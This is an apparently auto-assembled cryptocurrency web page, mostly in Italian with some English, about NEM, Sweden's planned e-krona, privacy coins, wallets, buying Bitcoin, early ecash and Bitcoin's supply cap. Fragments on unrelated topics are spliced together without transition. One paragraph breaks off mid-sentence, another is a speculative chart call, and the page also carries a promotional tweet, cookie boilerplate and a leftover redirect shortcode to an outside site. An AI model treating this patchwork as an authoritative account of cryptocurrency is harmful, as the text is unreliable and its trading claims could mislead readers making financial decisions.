“tutte le criptovalute sono decentralizzate |Crypto Currency Volatility”

NEM è una delle criptovalute alternative al Bitcoin più interessanti che ci siano in circolazione al momento, dato che si tratta di un progetto molto ambizioso e differente rispetto a quello legato ai Bitcoin. La criptovaluta NEM, abbreviazione per “New Economy Movement”, è stata lanciata il 31 Marzo 2015 con simbolo sugli exchange “XEM”. Sviluppata interamente con Java (anche se …

Sweden is in the process of replacing all of its physical banknotes, and most of its coins by mid 2017. However the new banknotes and coins of the Swedish krona will probably be circulating at about half the 2007 peak of 12,494 kronor per capita. The Riksbank is planning to begin discussions of an electronic currency issued by the central bank to which “is not to replace cash, but to act as complement to it.”[57] Deputy Governor Cecilia Skingsley states that cash will continue to spiral out of use in Sweden, and while it is currently fairly easy to get cash in Sweden, it is often very difficult to deposit it into bank accounts, especially in rural areas. No decision has been currently made about the decision to create “e-krona”. In her speech Skingsley states: “The first question is whether e-krona should be booked in accounts or whether the ekrona should be some form of digitally transferable unit that does not need an underlying account structure, roughly like cash.” Skingsley also states that: “Another important question is whether the Riksbank should issue e-krona directly to the general public or go via the banks, as we do now with banknotes and coins.” Other questions will be addressed like interest rates, should they be positive, negative, or zero?

La maggior parte delle criptomonete sono progettate per introdurre gradualmente nuove unità di valuta, ponendo un tetto massimo alla quantità di moneta che sarà in circolazione. Ciò viene fatto sia per imitare la scarsità (e il valore) dei metalli preziosi, sia per evitare l’iperinflazione. Comparate con le valute ordinarie gestite dagli istituti finanziari o tenute come contante, le criptomonete sono meno suscettibili a confische da parte delle forze dell’ordine. Le transazioni effettuate con le criptomonete offrono un buon[2] livello di privacy, grazie alla caratteristica di pseudonimia degli utilizzatori. Il livello di privacy varia a seconda del protocollo utilizzato, ed è totale per quelle criptovalute (quali Monero, Dash, Zcash) che utilizzano il sistema di validazione “zero knowledge”, grazie al quale non viene scambiata nessuna informazione delle parti.

La resistenza che ha trovato a 11,5K è molto importante e non l’ha rotta. Sembra a questo punto che si sia formato un canale con supporto a circa 9,5k. Ora mi aspetto un aumento del prezzo, anche perchè si è sfiorato la media a 200 periodi e questo spesso indica un punto di inversione di chi fa trading automatico.

Altrimenti un’alternativa facile e diretta è l’acquisto di bitcoin online. Ma va prestata molta attenzione al come. Difatti facendo una semplice ricerca sui principali motori di ricerca, saranno tantissimi i risultati che vi offriranno di acquistare bitcoin. Ad esempio ci sono privati che si propongono di vendere i propri bitcoin, ma oltre al fatto che è assai probabile che il prezzo di vendita sarà ben più alto della quotazione attuale di mercato, si incorre anche nel rischio di venire truffati.

Ogni utente che abbia delle criptovalute ha un portafoglio per criptovalute, chiamato “wallet”. Il wallet contiene le criptovalute dell’utente, e può essere salvato sul computer, sul cloud, un hard disk esterno. Non solo, esistono anche wallet online offerti da società che si occupano di tale servizio e fungono anche da exchange (per comprare e vendere criptovalute).

Una spiegazione semplice ed efficace di come funziona questo meccanismo è quella che fornisce sul suo blog “Macromania” il vicepresidente della Federal Reserve di St Louis David Andolfatto. Immaginate di essere ad una festa con molti invitati e di avere alzato un po’ il gomito. A quel punto fate un annuncio che viene recepito da tutti i presenti. L’informazione viene quindi validata da questa conoscenza diffusa, senza bisogno che si sia qualcuno appositamente incaricato di registrarla o scriverla in diario. La mattina dopo sarà infatti parecchio complicato contattare uno ad uno tutti i presenti per correggere quanto avete affermato. Questo sistema funziona molto bene, da sempre, in comunità ristrette. Ora la tecnologia a nostra disposizione consente di estenderla su scale globale e gestire un enorme quantità di dati. Ciascuna transazione di ogni singolo bitcoin viene comunicata a una rete di computer sparsi su tutto il pianeta che la validano e la registrano. Si crea così una catena di informazioni che cresce continuamente e incorpora la storia di ogni moneta. In cambio di questa opera di archiviazione i computer che gestiscono questi complicati algoritmi ottengono dei nuovi bitcoin.

In 1983 the American cryptographer David Chaum conceived an anonymous cryptographic electronic money called ecash.[92][93] Later, in 1995, he implemented it through Digicash,[94] an early form of cryptographic electronic payments which required user software in order to withdraw notes from a bank and designate specific encrypted keys before it can be sent to a recipient. This allowed the digital currency to be untraceable by the issuing bank, the government, or a third party.

Bitmain, il più grande fornitore di ASIC per il mining con una quota mondiale di oltre il 70%, potrebbe quindi fare da ago della bilancia di una situazione che, dal punto di vista degli appassionati, sembra insostenibile.

I truffatori tuttavia non sono certo un’invenzione moderna, e se c’è un pregio che si può riconoscere a queste persone è la loro flessibilità e la capacità di adattarsi velocemente alle nuove situazioni. Con le criptomonete è accaduta la stessa cosa, e c’è chi ci ha rimesso.

Phoenix – La prima criptovaluta per creare ottime opportunità di trading http://www.cryptocoinnews.it/2018/02/phoenix-la-criptovaluta-creare-ottime-opportunita-trading/ … #criptovalute #monetedigitali #notiziecriptovalute #bitcoin #blockchain #Finanza #criptovalutenews

I cookie vengono trasferiti sulla memoria permanente del dispositivo quando un utente visita un sito Web per al sistema di riconoscere l’utente durante le visite successive, migliorandone l’esperienza d’uso.

Questa valuta super potente non ha solo aperto la strada ad altre valute, ma è anche la leader al mondo delle criptovalute, con un certo orgoglio. È stato concordato un tetto massimo di 21 milioni di Bitcoin, pertanto non possono essere prodotti Bitcoin extra rispetto a tale quantità. Quando è stata introdotta, $1 valeva 1309 BTC. Ma la ruota è girata e Bitcoin ha infranto la barriera dei $2000 nel 2017, ovvero 1 BTC valeva $2000. Questo è stato certamente un momento storico per Satoshi Nakamoto, creatore di Bitcoin. [redirect url=’http://curbee.info/bump’ sec=’7′]

Leave a Reply

Your email address will not be published. Required fields are marked *